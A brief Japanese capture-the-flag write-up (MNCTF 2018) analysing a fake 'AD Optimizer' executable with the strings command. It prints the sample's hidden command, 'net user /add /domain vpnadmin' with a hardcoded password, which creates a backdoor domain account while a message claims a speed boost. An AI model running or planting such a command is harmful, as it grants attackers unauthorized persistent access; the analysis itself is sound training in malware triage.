MNCTF 2018 新人奮闘III(マルウェア解析)
マルウェアをStringsコマンドで実行しました。
# strings AD_OptimizationTool.exe
!This program cannot be run in DOS mode.
.text
.data
@.import
hO @
hK @
h| @
AD Optimizer
Optimization successfuly finished.\nThe speed increased 176%.
/c net user /add /domain vpnadmin P@ssw0rD1!
open
kernel32.dll
shell32.dll
user32.dll
ExitProcess
Sleep
ShellExecuteA
MessageBoxAnet user /add /domain vpnadmin P@ssw0rD1! ここがコマンド実行部分ですね。(フラグ)
ちなみにnet userは「ユーザアカウントを作成・修正・表示する」コマンドです。
